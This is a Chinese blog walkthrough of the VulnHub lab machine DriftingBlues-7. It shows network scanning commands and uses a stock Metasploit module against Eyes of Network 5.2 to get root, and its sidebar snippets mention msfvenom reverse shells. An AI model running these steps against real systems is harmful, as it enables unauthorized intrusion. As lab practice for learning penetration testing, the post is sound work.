靶机渗透练习08-driftingblues7 (msf的简单利用)

已于 2022-04-01 20:40:14 修改
阅读量800 收藏 1
点赞数
分类专栏: 和我一起来打靶! 文章标签: 渗透测试 web安全
于 2022-03-31 22:52:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forces_/article/details/123885929
版权

靶机地址: https://www.vulnhub.com/entry/driftingblues-7,680/

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.21
22—ssh—OpenSSH 7.4 (protocol 2.0)
66—http—SimpleHTTPServer 0.6 (Python 2.7.5)
80—http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
111—rpcbind—2-4 (RPC #100000)
443—ssl/http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
2403—taskmaster2000?
3306—mysql—MariaDB (unauthorized)
8086—http—InfluxDB http admin 1.7.9

3、老样子,还是先从80端口入手
在这里插入图片描述
映入演练的就是一个大大的eyes of network

4、百度搜了一下发现是一个开源的监控方案
在这里插入图片描述
既然如此直接在msf里看看有没有exp
在这里插入图片描述
ok,有一个可以直接用的exp,我们直接尝试利用看看呗(其实应该是先知道网站上的版本)
在源代码中,有很多css,逐一点开可以在其中一个发现network的版本为5.2,在我们exp适用的版本内

https://192.168.111.21/css/eonweb.css

在这里插入图片描述
5、msf漏洞利用

搜索漏洞:search eyes of network
使用模块: use 0
设置 kali: set lhost 192.168.111.7
设置攻击目录: set rhosts 192.168.111.21
运行模块: run

在这里插入图片描述
利用成功,getuid发现直接是root权限了。。好家伙
在这里插入图片描述
完结散花~

总结:
1、信息收集很重要,包括目录扫描,源代码探查等
2、searchsploit 、msf 工具的使用

参考:鹏组安全师傅的wp

佛系的新仔
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
TCP Ports list (3498 ports in list)
热门推荐
zyb378747350的专栏
01-11 42万+
参考地址:https://www.gasmi.net/tcp.php TCP Ports list (3498 ports in list) 1 tcpmux TCP Port Service Multiplexer 2 compressnet Management Utility 3 compressnet Compression Process
渗透测试指操作系统漏洞发现与防御概述
永远是少年
12-25 1101
今天继续给大家介绍渗透测试相关知识,本文主要内容是渗透测试指操作系统漏洞发现与防御概述。 一、操作系统漏洞发现概述 二、操作系统漏洞发现利用方法 三、操作系统漏洞发现修复
Driftingblues靶机系列Driftingblues7
最新发布
m0_74950307的博客
05-09 343
发现好多东西,web服务存在http和https,http存在80端口的https和66端口的http。Flag.txt文件。
渗透测试工具篇之Metasploit(MSF)扫描模块的简单使用
lzp_5257的博客
04-26 5692
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 MSF扫描模块的作用就是帮助我们进行信息收集 一、MSF与nmap的调用 漏洞扫描命令:(使用vuln脚本进行全面的漏洞扫描) db_nmap --script=vuln 192.168.xxx.xxx 指纹识别扫描命令:(扫描系统和程序版本号检测,并输出详细信息) db_nmap -sV -v 193.168.xxx.xxx 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import panda.
msf的用法,msfvenom生成shell
Xkhf1的博客
10-02 215
开头的则是exp漏洞利用模块,先探测如果可行,再使用exp模块,使用方法一样。用msfvenom模块生成一个基于tcp的反弹shell木马为shell.exe,攻击机为:192.168.112.148,监听端口为:4444 ,​ 此时生成的是一个.exe文件,我们需要将这个.exe文件交给目标,让目标把.exe文件放在目标主机上我们才能运行,或者我们可以上传到目标主机。不到,那么利用之前信息搜集收集到的web容器版本,数据库版本,操作系统版本等,用。是生成的木马类型,这里是.exe文件,
MSF学习篇之基本命令使用<1>
qq_30890029的博客
05-16 673
search cve:CVE-2017-8464 type:exploit 查找cve可执行exp漏洞。search命令是Metasploit框架中常用的命令,在日常使用中非常快速的查找模块或者漏洞。search name:mysql type:exploit 查找mysql漏洞类型是exp。存储了大量的漏洞利用程序/使用searchsploit可以搜索漏洞库里的利用程序。mysql/ssh/weblogic/ftp/telnet 等组件。show options 查看编号为1的exp利用所需要的参数。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
TASKMASTER: An Architecture Pattern for GUI Applications
05-02
介绍MVC的用途和设计时的一些考虑点
dc-1 靶机渗透学习
..
03-11 3138
环境: Vmware 虚拟机软件 dc -1 靶机ip地址:192.168.202.130 kali攻击机ip地址:192.168.202.129 本次渗透过程kali攻击机和dc靶机都采取NAT模式 信息收集 首先用ipconfig查看当前kali机所处网段。 得到当前kali机的ip地址后,用nmap对当前网段进行扫描,主机探活。 nmap超详细使用教程_Kris__zhang的博客-CSDN博客_nmap使用教程 nmap -sP 192.168.202.0/24 .
【内网安全】——内网主机发现
Demo不是emo的博客
11-13 8468
在内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机进行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。那主机发现都有哪些方法呢?
kali工具熟悉——存活主机识别
beidideshu的博客
10-15 6063
kali工具熟悉一下——存活主机识别,主要是根据响应包来判断主机是否在线
靶机渗透练习46-dpwwn-01
hirak0的博客
04-19 537
靶机描述 靶机地址:https://www.vulnhub.com/entry/dpwwn-1,342/ About Release Name: dpwwn-01 Date release: 04 Aug 2019 Author: Debashis Pal Series: dpwwn Description This boot2root is a linux based virtual machine and has been tested using VMware workstation 14. The
MSF渗透基础知识
m0_63917373的博客
02-20 411
MSF windows提权 渗透安卓 Metasploit
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 640
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
Aluxian_的博客
06-24 1387
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.168.205.
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值